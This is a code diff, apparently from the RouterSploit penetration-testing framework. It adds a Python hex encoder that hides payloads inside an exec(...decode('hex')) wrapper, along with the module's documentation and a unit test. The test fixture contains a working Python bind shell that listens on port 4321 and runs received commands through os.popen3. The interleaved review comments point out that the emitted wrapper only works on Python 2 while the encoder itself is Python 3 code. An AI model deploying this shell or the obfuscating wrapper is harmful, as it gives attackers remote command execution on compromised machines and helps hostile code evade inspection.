1+ ## Description
2+
3+ Module encodes Python payload to hex format.
4+
5+ ## Verification Steps
6+
7+ 1 . Start ` ./rsf.py `
8+ 2 . Do: ` use encoders/python/hex `
9+ 3 . Do: ` show info `
10+
11+ ## Scenarios
12+
13+ ```
14+ rsf > use encoders/python/hex
15+ rsf (Python Hex Encoder) > show info
16+
17+ Name:
18+ Python Hex Encoder
19+
20+ Description:
21+ Module encodes Python payload to Hex format.
22+
23+ Authors:
24+ - Marcin Bury <marcin[at]threat9.com>
25+ ```
1+ from routersploit .core .exploit .encoders import BaseEncoder
2+ from routersploit .core .exploit .payloads import Architectures
3+
4+
5+ class Encoder (BaseEncoder ):
6+ __info__ = {
7+ "name" : "Python Hex Encoder" ,
8+ "description" : "Module encodes Python payload to Hex format." ,
9+ "authors" : (
10+ "Marcin Bury <marcin[at]threat9.com>" , # routersploit module
11+ ),
12+ }
13+
14+ architecture = Architectures .PYTHON
15+
16+ def encode (self , payload ):
17+ encoded_payload = bytes (payload , "utf-8" ).hex ()
18+ return "exec('{}'.decode('hex'))" .format (encoded_payload )
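Review bot: `encode` has no docstring, and the interpreter it targets is not stated anywhere. The returned wrapper calls `.decode('hex')` on a string literal, which exists only on Python 2 `str`, while the encoding step itself (`bytes(payload, "utf-8").hex()`) is Python 3 code. I would add a docstring such as `"""Return payload (str) hex-encoded inside an exec() wrapper; the wrapper assumes a Python 2 interpreter."""` and state the same constraint in the module's `description`. A short comment should also say that hex is a reversible re-encoding of the same bytes, so the output remains recognisable by its `exec(` … `.decode('hex')` frame around a long hex literal.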
1+ from routersploit .modules .encoders .python .hex import Encoder
2+
3+
4+ # python bind tcp payload with rport=4321
5+ bind_tcp = (
6+ "import socket,os\n " +
7+ "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n " +
8+ "so.bind(('0.0.0.0',4321))\n " +
9+ "so.listen(1)\n " +
10+ "so,addr=so.accept()\n " +
11+ "x=False\n " +
12+ "while not x:\n " +
13+ "\t data=so.recv(1024)\n " +
14+ "\t stdin,stdout,stderr,=os.popen3(data)\n " +
15+ "\t stdout_value=stdout.read()+stderr.read()\n " +
16+ "\t so.send(stdout_value)\n "
17+ )
18+
19+ # python bind tcp payload with rport=4321 encoded with python/hex
20+ bind_tcp_encoded = (
21+ "exec('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'.decode('hex'))"
22+ )
23+
24+
25+ def test_payload_enconding ():
26+ """ Test scenario - payload encoding """
27+
28+ encoder = Encoder ()
29+ assert encoder .encode (bind_tcp ) == bind_tcp_encoded
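Review bot: The test name is misspelled (`test_payload_enconding`), and its only case compares against one long opaque hex literal that nobody can check by eye. I would rename it to `test_payload_encoding` and add a hand-verifiable case, `assert encoder.encode("a") == "exec('61'.decode('hex'))"`, plus the empty-input case `assert encoder.encode("") == "exec(''.decode('hex'))"`. A neutral fixture string would exercise the encoder just as well as the bind-shell source, and it would keep a listener snippet out of the test tree.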